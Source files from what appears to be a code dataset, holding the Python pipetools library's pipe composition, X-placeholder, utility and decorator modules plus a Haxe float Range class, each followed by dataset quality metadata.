__repr__ = __str__
@staticmethod
def compose(first, second):
name = lambda: '{0} | {1}'.format(get_name(first), get_name(second))
def composite(*args, **kwargs):
return second(first(*args, **kwargs))
return set_name(name, composite)
@classmethod
def bind(cls, first, second, new_cls=None):
return (new_cls or cls)(
first if second is None else
second if first is None else
cls.compose(first, second))
def __or__(self, next_func):
# Handle multiple pipes in pipe definition and also changing pipe type to e.g. Maybe
# this is needed because of evaluation order
pipe_in_a_pipe = isinstance(next_func, Pipe) and next_func.func is None
new_cls = type(next_func) if pipe_in_a_pipe else None
next = None if pipe_in_a_pipe else prepare_function_for_pipe(next_func)
return self.bind(self.func, next, new_cls)
def __ror__(self, prev_func):
return self.bind(prepare_function_for_pipe(prev_func), self.func)
def __lt__(self, thing):
return self.func(thing) if self.func else thing
def __call__(self, *args, **kwargs):
return self.func(*args, **kwargs)
def __get__(self, instance, owner):
return partial(self, instance) if instance else self
pipe = Pipe()
class Maybe(Pipe):
@staticmethod
def compose(first, second):
name = lambda: '{0} ?| {1}'.format(get_name(first), get_name(second))
def composite(*args, **kwargs):
result = first(*args, **kwargs)
return None if result is None else second(result)
return set_name(name, composite)
def __call__(self, *args, **kwargs):
if len(args) == 1 and args[0] is None and not kwargs:
return None
return self.func(*args, **kwargs)
def __lt__(self, thing):
return (
None if thing is None else
self.func(thing) if self.func else
thing)
maybe = Maybe()
def prepare_function_for_pipe(thing):
if isinstance(thing, XObject):
return ~thing
if isinstance(thing, tuple):
return xpartial(*thing)
if isinstance(thing, string_types):
return StringFormatter(thing)
if callable(thing):
return thing
raise ValueError('Cannot pipe %s' % thing)
def StringFormatter(template):
f = text_type(template).format
def format(content):
if isinstance(content, dict):
return f(**content)
if _iterable(content):
return f(*content)
return f(content)
return set_name(lambda: "format('%s')" % template[:20], format)
def _iterable(obj):
"Iterable but not a string"
return isinstance(obj, Iterable) and not isinstance(obj, string_types)
class XObject(object):
def __init__(self, func=None):
self._func = func
set_name(lambda: get_name(func) if func else 'X', self)
def __repr__(self):
return get_name(self)
def __invert__(self):
return self._func or set_name('X', lambda x: x)
def bind(self, name, func):
set_name(name, func)
return XObject((self._func | func) if self._func else (pipe | func))
def __call__(self, *args, **kwargs):
name = lambda: 'X(%s)' % repr_args(*args, **kwargs)
return self.bind(name, lambda x: x(*args, **kwargs))
def __hash__(self):
return super(XObject, self).__hash__()
def __eq__(self, other):
return self.bind(lambda: 'X == {0!r}'.format(other), lambda x: x == other)
def __getattr__(self, name):
return self.bind(lambda: 'X.{0}'.format(name), lambda x: getattr(x, name))
def __getitem__(self, item):
return self.bind(lambda: 'X[{0!r}]'.format(item), lambda x: x[item])
def __gt__(self, other):
return self.bind(lambda: 'X > {0!r}'.format(other), lambda x: x > other)
def __ge__(self, other):
return self.bind(lambda: 'X >= {0!r}'.format(other), lambda x: x >= other)
def __lt__(self, other):
return self.bind(lambda: 'X < {0!r}'.format(other), lambda x: x < other)
def __le__(self, other):
return self.bind(lambda: 'X <= {0!r}'.format(other), lambda x: x <= other)
def __ne__(self, other):
return self.bind(lambda: 'X != {0!r}'.format(other), lambda x: x != other)
def __pos__(self):
return self.bind(lambda: '+X', lambda x: +x)
def __neg__(self):
return self.bind(lambda: '-X', lambda x: -x)
def __mul__(self, other):
return self.bind(lambda: 'X * {0!r}'.format(other), lambda x: x * other)
def __rmul__(self, other):
return self.bind(lambda: '{0!r} * X'.format(other), lambda x: other * x)
def __matmul__(self, other):
# prevent syntax error on legacy interpretors
from operator import matmul
return self.bind(lambda: 'X @ {0!r}'.format(other), lambda x: matmul(x, other))
def __rmatmul__(self, other):
from operator import matmul
return self.bind(lambda: '{0!r} @ X'.format(other), lambda x: matmul(other, x))
def __div__(self, other):
return self.bind(lambda: 'X / {0!r}'.format(other), lambda x: x / other)
def __rdiv__(self, other):
return self.bind(lambda: '{0!r} / X'.format(other), lambda x: other / x)
def __truediv__(self, other):
return self.bind(lambda: 'X / {0!r}'.format(other), lambda x: x / other)
def __rtruediv__(self, other):
return self.bind(lambda: '{0!r} / X'.format(other), lambda x: other / x)
def __floordiv__(self, other):
return self.bind(lambda: 'X // {0!r}'.format(other), lambda x: x // other)
def __rfloordiv__(self, other):
return self.bind(lambda: '{0!r} // X'.format(other), lambda x: other // x)
def __mod__(self, other):
return self.bind(lambda: 'X % {0!r}'.format(other), lambda x: x % other)
def __rmod__(self, other):
return self.bind(lambda: '{0!r} % X'.format(other), lambda x: other % x)
def __add__(self, other):
return self.bind(lambda: 'X + {0!r}'.format(other), lambda x: x + other)
def __radd__(self, other):
return self.bind(lambda: '{0!r} + X'.format(other), lambda x: other + x)
def __sub__(self, other):
return self.bind(lambda: 'X - {0!r}'.format(other), lambda x: x - other)
def __rsub__(self, other):
return self.bind(lambda: '{0!r} - X'.format(other), lambda x: other - x)
def __pow__(self, other):
return self.bind(lambda: 'X ** {0!r}'.format(other), lambda x: x ** other)
def __rpow__(self, other):
return self.bind(lambda: '{0!r} ** X'.format(other), lambda x: other ** x)
def __lshift__(self, other):
return self.bind(lambda: 'X << {0!r}'.format(other), lambda x: x << other)
def __rlshift__(self, other):
return self.bind(lambda: '{0!r} << X'.format(other), lambda x: other << x)
def __rshift__(self, other):
return self.bind(lambda: 'X >> {0!r}'.format(other), lambda x: x >> other)
def __rrshift__(self, other):
return self.bind(lambda: '{0!r} >> X'.format(other), lambda x: other >> x)
def __and__(self, other):
return self.bind(lambda: 'X & {0!r}'.format(other), lambda x: x & other)
def __rand__(self, other):
return self.bind(lambda: '{0!r} & X'.format(other), lambda x: other & x)
def __xor__(self, other):
return self.bind(lambda: 'X ^ {0!r}'.format(other), lambda x: x ^ other)
def __rxor__(self, other):
return self.bind(lambda: '{0!r} ^ X'.format(other), lambda x: other ^ x)
def __ror__(self, func):
return pipe | func | self
def __or__(self, func):
if isinstance(func, Pipe):
return func.__ror__(self)
return pipe | self | func
def _in_(self, y):
return self.bind(lambda: 'X._in_({0!r})'.format(y), lambda x: x in y)
X = XObject()
def xpartial(func, *xargs, **xkwargs):
"""
Like :func:`functools.partial`, but can take an :class:`XObject`
placeholder that will be replaced with the first positional argument
when the partially applied function is called.
Useful when the function's positional arguments' order doesn't fit your
situation, e.g.:
>>> reverse_range = xpartial(range, X, 0, -1)
>>> reverse_range(5)
[5, 4, 3, 2, 1]
It can also be used to transform the positional argument to a keyword
argument, which can come in handy inside a *pipe*::
xpartial(objects.get, id=X)
Also the XObjects are evaluated, which can be used for some sort of
destructuring of the argument::
xpartial(somefunc, name=X.name, number=X.contacts['number'])
Lastly, unlike :func:`functools.partial`, this creates a regular function
which will bind to classes (like the ``curry`` function from
``django.utils.functional``).
"""
any_x = any(isinstance(a, XObject) for a in xargs + tuple(xkwargs.values()))
use = lambda x, value: (~x)(value) if isinstance(x, XObject) else x
@wraps(func, assigned=filter(partial(hasattr, func), WRAPPER_ASSIGNMENTS))
def xpartially_applied(*func_args, **func_kwargs):
if any_x:
if not func_args:
raise ValueError('Function "%s" partially applied with an '
'X placeholder but called with no positional arguments.'
% get_name(func))
first = func_args[0]
rest = func_args[1:]
args = tuple(use(x, first) for x in xargs) + rest
kwargs = dict((k, use(x, first)) for k, x in dict_items(xkwargs))
kwargs.update(func_kwargs)
else:
args = xargs + func_args
kwargs = dict(xkwargs, **func_kwargs)
return func(*args, **kwargs)
name = lambda: '%s(%s)' % (get_name(func), repr_args(*xargs, **xkwargs))
return set_name(name, xpartially_applied)
| 10,548 | main | py | en | python | code | {"qsc_code_num_words": 1469, "qsc_code_num_chars": 10548.0, "qsc_code_mean_word_length": 4.19469027, "qsc_code_frac_words_unique": 0.15656909, "qsc_code_frac_chars_top_2grams": 0.07383966, "qsc_code_frac_chars_top_3grams": 0.09087958, "qsc_code_frac_chars_top_4grams": 0.12009088, "qsc_code_frac_chars_dupe_5grams": 0.44027913, "qsc_code_frac_chars_dupe_6grams": 0.39483934, "qsc_code_frac_chars_dupe_7grams": 0.37698799, "qsc_code_frac_chars_dupe_8grams": 0.37698799, "qsc_code_frac_chars_dupe_9grams": 0.34404414, "qsc_code_frac_chars_dupe_10grams": 0.34404414, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.00669869, "qsc_code_frac_chars_whitespace": 0.2499052, "qsc_code_size_file_byte": 10548.0, "qsc_code_num_lines": 325.0, "qsc_code_num_chars_line_max": 93.0, "qsc_code_num_chars_line_mean": 32.45538462, "qsc_code_frac_chars_alphabet": 0.7721183, "qsc_code_frac_chars_comments": 0.10656049, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.115, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.05471092, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codepython_cate_ast": 1.0, "qsc_codepython_frac_lines_func_ratio": 0.325, "qsc_codepython_cate_var_zero": false, "qsc_codepython_frac_lines_pass": 0.0, "qsc_codepython_frac_lines_import": 0.04, "qsc_codepython_frac_lines_simplefunc": 0.235, "qsc_codepython_score_lines_no_logic": 0.735, "qsc_codepython_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codepython_cate_ast": 0, "qsc_codepython_frac_lines_func_ratio": 1, "qsc_codepython_cate_var_zero": 0, "qsc_codepython_frac_lines_pass": 0, "qsc_codepython_frac_lines_import": 0, "qsc_codepython_frac_lines_simplefunc": 1, "qsc_codepython_score_lines_no_logic": 1, "qsc_codepython_frac_lines_print": 0} |
0101/pipetools | pipetools/utils.py | from __future__ import print_function
try:
from collections.abc import Mapping
except ImportError:
from collections import Mapping
from functools import partial, wraps
from itertools import islice, takewhile, dropwhile
import operator
from pipetools.compat import map, filter, range, dict_items
from pipetools.debug import set_name, repr_args, get_name
from pipetools.decorators import data_structure_builder, regex_condition
from pipetools.decorators import pipe_util, auto_string_formatter
from pipetools.main import pipe, X, _iterable
KEY, VALUE = X[0], X[1]
@pipe_util
@auto_string_formatter
@data_structure_builder
def foreach(function):
"""
Returns a function that takes an iterable and returns an iterator over the
results of calling `function` on each item of the iterable.
>>> range(5) > foreach(factorial) | list
[1, 1, 2, 6, 24]
"""
return partial(map, function)
@pipe_util
def foreach_do(function):
"""
Like :func:`foreach` but is evaluated immediately and doesn't return
anything.
For the occasion that you just want to do some side-effects::
open('addresses.txt') > foreach(geocode) | foreach_do(launch_missile)
-- With :func:`foreach` nothing would happen (except an itetrator being
created)
"""
def f(iterable):
for item in iterable:
function(item)
return f
@pipe_util
@regex_condition
def where(condition):
"""
Pipe-able lazy filter.
>>> odd_range = range | where(X % 2) | list
>>> odd_range(10)
[1, 3, 5, 7, 9]
"""
return partial(filter, condition)
@pipe_util
@regex_condition
def where_not(condition):
"""
Inverted :func:`where`.
"""
return partial(filter, pipe | condition | operator.not_)
@pipe_util
@data_structure_builder
def sort_by(function):
"""
Sorts an incoming sequence by using the given `function` as key.
>>> range(10) > sort_by(-X)
[9, 8, 7, 6, 5, 4, 3, 2, 1, 0]
Supports automatic data-structure creation::
users > sort_by([X.last_name, X.first_name])
There is also a shortcut for ``sort_by(X)`` called ``sort``:
>>> [4, 5, 8, -3, 0] > sort
[-3, 0, 4, 5, 8]
And (as of ``0.2.3``) a shortcut for reversing the sort:
>>> 'asdfaSfa' > sort_by(X.lower()).descending
['s', 'S', 'f', 'f', 'd', 'a', 'a', 'a']
"""
f = partial(sorted, key=function)
f.attrs = {'descending': _descending_sort_by(function)}
return f
@pipe_util
def _descending_sort_by(function):
return partial(sorted, key=function, reverse=True)
sort = sort_by(X)
@pipe_util
@auto_string_formatter
@data_structure_builder
def debug_print(function):
"""
Prints function applied on input and returns the input.
::
foo = (pipe
| something
| debug_print(X.get_status())
| something_else
| foreach(debug_print("attr is: {0.attr}"))
| etc)
"""
def debug(thing):
print(function(thing))
return thing
return debug
@pipe_util
def tee(function):
"""
Sends a copy of the input into function - like a T junction.
"""
def _tee(thing):
function(thing)
return thing
return _tee
@pipe_util
def as_args(function):
"""
Applies the sequence in the input as positional arguments to `function`.
::
some_lists > as_args(izip)
"""
return lambda x: function(*x)
@pipe_util
def as_kwargs(function):
"""
Applies the dictionary in the input as keyword arguments to `function`.
"""
return lambda x: function(**x)
def take_first(count):
"""
Assumes an iterable on the input, returns an iterable with first `count`
items from the input (or possibly less, if there isn't that many).
>>> range(9000) > where(X % 100 == 0) | take_first(5) | tuple
(0, 100, 200, 300, 400)
"""
def _take_first(iterable):
return islice(iterable, count)
return pipe | set_name('take_first(%s)' % count, _take_first)
def drop_first(count):
"""
Assumes an iterable on the input, returns an iterable with identical items
except for the first `count`.
>>> range(10) > drop_first(5) | tuple
(5, 6, 7, 8, 9)
"""
def _drop_first(iterable):
g = (x for x in range(1, count + 1))
return dropwhile(
lambda i: unless(StopIteration, lambda: next(g))(), iterable)
return pipe | set_name('drop_first(%s)' % count, _drop_first)
def unless(exception_class_or_tuple, func, *args, **kwargs):
"""
When `exception_class_or_tuple` occurs while executing `func`, it will
be caught and ``None`` will be returned.
>>> f = where(X > 10) | list | unless(IndexError, X[0])
>>> f([5, 8, 12, 4])
12
>>> f([1, 2, 3])
None
"""
@pipe_util
@auto_string_formatter
@data_structure_builder
def construct_unless(function):
# a wrapper so we can re-use the decorators
def _unless(*args, **kwargs):
try:
return function(*args, **kwargs)
except exception_class_or_tuple:
pass
return _unless
name = lambda: 'unless(%s, %s)' % (exception_class_or_tuple, ', '.join(
filter(None, (get_name(func), repr_args(*args, **kwargs)))))
return set_name(name, construct_unless(func, *args, **kwargs))
@pipe_util
@regex_condition
def select_first(condition):
"""
Returns first item from input sequence that satisfies `condition`. Or
``None`` if none does.
>>> ['py', 'pie', 'pi'] > select_first(X.startswith('pi'))
'pie'
As of ``0.2.1`` you can also
:ref:`directly use regular expressions <auto-regex>` and write the above
as:
>>> ['py', 'pie', 'pi'] > select_first('^pi')
'pie'
There is also a shortcut for ``select_first(X)`` called ``first_of``:
>>> first_of(['', None, 0, 3, 'something'])
3
>>> first_of([])
None
"""
return where(condition) | unless(StopIteration, next)
first_of = select_first(X)
@pipe_util
@auto_string_formatter
@data_structure_builder
def group_by(function):
"""
Groups input sequence by `function`.
Returns an iterator over a sequence of tuples where the first item is a
result of `function` and the second one a list of items matching this
result.
Ordering of the resulting iterator is undefined, but ordering of the items
in the groups is preserved.
>>> [1, 2, 3, 4, 5, 6] > group_by(X % 2) | list
[(0, [2, 4, 6]), (1, [1, 3, 5])]
"""
def _group_by(seq):
result = {}
for item in seq:
result.setdefault(function(item), []).append(item)
return dict_items(result)
return _group_by
def _flatten(x):
if not _iterable(x) or isinstance(x, Mapping):
yield x
else:
for y in x:
for z in _flatten(y):
yield z
def flatten(*args):
"""
Flattens an arbitrarily deep nested iterable(s).
>>> [[[[[[1]]], 2], range(2) > foreach(X + 3)]] > flatten | list
[1, 2, 3, 4]
Does not treat strings and (as of ``0.3.1``) mappings (dictionaries)
as iterables so these are left alone.
>>> ('hello', [{'how': 'are'}, [['you']]]) > flatten | list
['hello', {'how': 'are'}, 'you']
Also turns non-iterables into iterables which is convenient when you
are not sure about the input.
>>> 'stuff' > flatten | list
['stuff']
"""
return _flatten(args)
flatten = wraps(flatten)(pipe | flatten)
def count(iterable):
"""
Returns the number of items in `iterable`.
"""
return sum(1 for whatever in iterable)
count = wraps(count)(pipe | count)
@pipe_util
@regex_condition
def take_until(condition):
"""
>>> [1, 4, 6, 4, 1] > take_until(X > 5) | list
[1, 4]
>>> [1, 4, 6, 4, 1] > take_until(X > 5).including | list
[1, 4, 6]
"""
f = partial(takewhile, pipe | condition | operator.not_)
f.attrs = {'including': take_until_including(condition)}
return f
@pipe_util
@regex_condition
def take_until_including(condition):
"""
>>> [1, 4, 6, 4, 1] > take_until_including(X > 5) | list
[1, 4, 6]
"""
def take_until_including_(interable):
for i in interable:
if not condition(i):
yield i
else:
yield i
break
return take_until_including_
| 8,446 | utils | py | en | python | code | {"qsc_code_num_words": 1148, "qsc_code_num_chars": 8446.0, "qsc_code_mean_word_length": 4.39198606, "qsc_code_frac_words_unique": 0.24303136, "qsc_code_frac_chars_top_2grams": 0.02538675, "qsc_code_frac_chars_top_3grams": 0.02380008, "qsc_code_frac_chars_top_4grams": 0.01785006, "qsc_code_frac_chars_dupe_5grams": 0.16580722, "qsc_code_frac_chars_dupe_6grams": 0.11305038, "qsc_code_frac_chars_dupe_7grams": 0.09698532, "qsc_code_frac_chars_dupe_8grams": 0.07576359, "qsc_code_frac_chars_dupe_9grams": 0.0694169, "qsc_code_frac_chars_dupe_10grams": 0.04323681, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02337415, "qsc_code_frac_chars_whitespace": 0.25538717, "qsc_code_size_file_byte": 8446.0, "qsc_code_num_lines": 350.0, "qsc_code_num_chars_line_max": 79.0, "qsc_code_num_chars_line_mean": 24.13142857, "qsc_code_frac_chars_alphabet": 0.77834314, "qsc_code_frac_chars_comments": 0.44316836, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.3030303, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.01526903, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codepython_cate_ast": 1.0, "qsc_codepython_frac_lines_func_ratio": 0.21969697, "qsc_codepython_cate_var_zero": false, "qsc_codepython_frac_lines_pass": 0.00757576, "qsc_codepython_frac_lines_import": 0.09090909, "qsc_codepython_frac_lines_simplefunc": 0.015151515151515152, "qsc_codepython_score_lines_no_logic": 0.50757576, "qsc_codepython_frac_lines_print": 0.02272727} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codepython_cate_ast": 0, "qsc_codepython_frac_lines_func_ratio": 1, "qsc_codepython_cate_var_zero": 0, "qsc_codepython_frac_lines_pass": 0, "qsc_codepython_frac_lines_import": 0, "qsc_codepython_frac_lines_simplefunc": 0, "qsc_codepython_score_lines_no_logic": 1, "qsc_codepython_frac_lines_print": 0} |
0101/pipetools | pipetools/decorators.py | import re
from functools import partial, wraps
from pipetools.debug import repr_args, set_name, get_name
from pipetools.ds_builder import DSBuilder, NoBuilder
from pipetools.main import pipe, XObject, StringFormatter, xpartial, maybe
from pipetools.compat import string_types, dict_items
def pipe_util(func):
"""
Decorator that handles X objects and partial application for pipe-utils.
"""
@wraps(func)
def pipe_util_wrapper(function, *args, **kwargs):
if isinstance(function, XObject):
function = ~function
original_function = function
if args or kwargs:
function = xpartial(function, *args, **kwargs)
name = lambda: '%s(%s)' % (get_name(func), ', '.join(
filter(None, (get_name(original_function), repr_args(*args, **kwargs)))))
f = func(function)
result = pipe | set_name(name, f)
# if the util defines an 'attrs' mapping, copy it as attributes
# to the result
attrs = getattr(f, 'attrs', {})
for k, v in dict_items(attrs):
setattr(result, k, v)
return result
return pipe_util_wrapper
def auto_string_formatter(func):
"""
Decorator that handles automatic string formatting.
By converting a string argument to a function that does formatting on said
string.
"""
@wraps(func)
def auto_string_formatter_wrapper(function, *args, **kwargs):
if isinstance(function, string_types):
function = StringFormatter(function)
return func(function, *args, **kwargs)
return auto_string_formatter_wrapper
def data_structure_builder(func):
"""
Decorator to handle automatic data structure creation for pipe-utils.
"""
@wraps(func)
def ds_builder_wrapper(function, *args, **kwargs):
try:
function = DSBuilder(function)
except NoBuilder:
pass
return func(function, *args, **kwargs)
return ds_builder_wrapper
def regex_condition(func):
"""
If a condition is given as string instead of a function, it is turned
into a regex-matching function.
"""
@wraps(func)
def regex_condition_wrapper(condition, *args, **kwargs):
if isinstance(condition, string_types):
condition = maybe | partial(re.match, condition)
return func(condition, *args, **kwargs)
return regex_condition_wrapper
| 2,427 | decorators | py | en | python | code | {"qsc_code_num_words": 290, "qsc_code_num_chars": 2427.0, "qsc_code_mean_word_length": 5.37241379, "qsc_code_frac_words_unique": 0.33793103, "qsc_code_frac_chars_top_2grams": 0.05776637, "qsc_code_frac_chars_top_3grams": 0.06931964, "qsc_code_frac_chars_top_4grams": 0.04813864, "qsc_code_frac_chars_dupe_5grams": 0.1322208, "qsc_code_frac_chars_dupe_6grams": 0.1322208, "qsc_code_frac_chars_dupe_7grams": 0.05776637, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.0, "qsc_code_frac_chars_whitespace": 0.24927895, "qsc_code_size_file_byte": 2427.0, "qsc_code_num_lines": 84.0, "qsc_code_num_chars_line_max": 86.0, "qsc_code_num_chars_line_mean": 28.89285714, "qsc_code_frac_chars_alphabet": 0.85510428, "qsc_code_frac_chars_comments": 0.18829831, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.13043478, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.00685654, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codepython_cate_ast": 1.0, "qsc_codepython_frac_lines_func_ratio": 0.17391304, "qsc_codepython_cate_var_zero": false, "qsc_codepython_frac_lines_pass": 0.02173913, "qsc_codepython_frac_lines_import": 0.13043478, "qsc_codepython_frac_lines_simplefunc": 0.0, "qsc_codepython_score_lines_no_logic": 0.47826087, "qsc_codepython_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codepython_cate_ast": 0, "qsc_codepython_frac_lines_func_ratio": 0, "qsc_codepython_cate_var_zero": 0, "qsc_codepython_frac_lines_pass": 0, "qsc_codepython_frac_lines_import": 0, "qsc_codepython_frac_lines_simplefunc": 0, "qsc_codepython_score_lines_no_logic": 0, "qsc_codepython_frac_lines_print": 0} |
01010111/zerolib | zero/utilities/Range.hx | package zero.utilities;
using Math;
using zero.extensions.FloatExt;
/**
* A class representing a range of floating point numbers
*
* **Usage:**
*
* - Initialize using Range.get() `var range = Range.get(0, 0);`
* - Or with an array `var range:Range = [0, 1];`
* - Recycle ranges when you're done with them: `my_range.put()`
*/
abstract Range(Vec2)
{
// Array creation/access
@:from static function from_array_float(input:Array<Float>) return new Range(input[0], input[1]);
@:from static function from_array_int(input:Array<Int>) return new Range(input[0], input[1]);
// Pooling
static var pool:Array<Range> = [];
public static function get(min:Float = 0, max:Float = 1):Range return pool.length > 0 ? pool.shift().set(min, max) : new Range(min, max);
public inline function put()
{
pool.push(cast this);
this = null;
}
function new(min:Float = 0, max:Float = 1) this = Vec2.get(min, max);
public inline function set(min:Float = 0, max:Float = 1):Range
{
this.x = min;
this.y = max;
return cast this;
}
public var min (get, set):Float;
function get_min() return this.x;
function set_min(v) {
this.x = v;
return v;
}
public var max (get, set):Float;
function get_max() return this.y;
function set_max(v) {
this.y = v;
return v;
}
public var difference (get, never):Float;
inline function get_difference() return max - min;
public inline function in_range(v:Float):Bool return v >= min && v <= max;
public inline function copy_from(v:Range):Range return set(v.min, v.max);
public inline function copy():Range return Range.get(min, max);
public inline function equals(v:Range):Bool return min == v.min && max == v.max;
public inline function toString():String return 'min: $min | max: $max | difference: $difference';
public inline function get_random():Float return max.get_random(min);
public inline function normalize(v:Float):Float return v.map(min, max, 0, 1);
public inline function denormalize(v:Float):Float return v.map(0, 1, min, max);
// Operator Overloads
@:op(A + B) static function add(v:Range, n:Float):Range return Range.get(v.min + n, v.max + n);
@:op(A - B) static function subtract(v:Range, n:Float):Range return Range.get(v.min - n, v.max - n);
@:op(A * B) static function multiply(v:Range, n:Float):Range return Range.get(v.min * n, v.max * n);
@:op(A / B) static function divide(v:Range, n:Float):Range return Range.get(v.min / n, v.max / n);
@:op(A % B) static function mod(v:Range, n:Float):Range return Range.get(v.min % n, v.max % n);
} | 2,534 | Range | hx | en | haxe | code | {"qsc_code_num_words": 419, "qsc_code_num_chars": 2534.0, "qsc_code_mean_word_length": 4.08591885, "qsc_code_frac_words_unique": 0.20047733, "qsc_code_frac_chars_top_2grams": 0.08995327, "qsc_code_frac_chars_top_3grams": 0.11682243, "qsc_code_frac_chars_top_4grams": 0.08060748, "qsc_code_frac_chars_dupe_5grams": 0.4421729, "qsc_code_frac_chars_dupe_6grams": 0.32535047, "qsc_code_frac_chars_dupe_7grams": 0.25642523, "qsc_code_frac_chars_dupe_8grams": 0.19918224, "qsc_code_frac_chars_dupe_9grams": 0.16179907, "qsc_code_frac_chars_dupe_10grams": 0.16179907, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.0099197, "qsc_code_frac_chars_whitespace": 0.16456196, "qsc_code_size_file_byte": 2534.0, "qsc_code_num_lines": 72.0, "qsc_code_num_chars_line_max": 139.0, "qsc_code_num_chars_line_mean": 35.19444444, "qsc_code_frac_chars_alphabet": 0.79877185, "qsc_code_frac_chars_comments": 0.12707182, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.04081633, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.02123814, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0} | 1 | 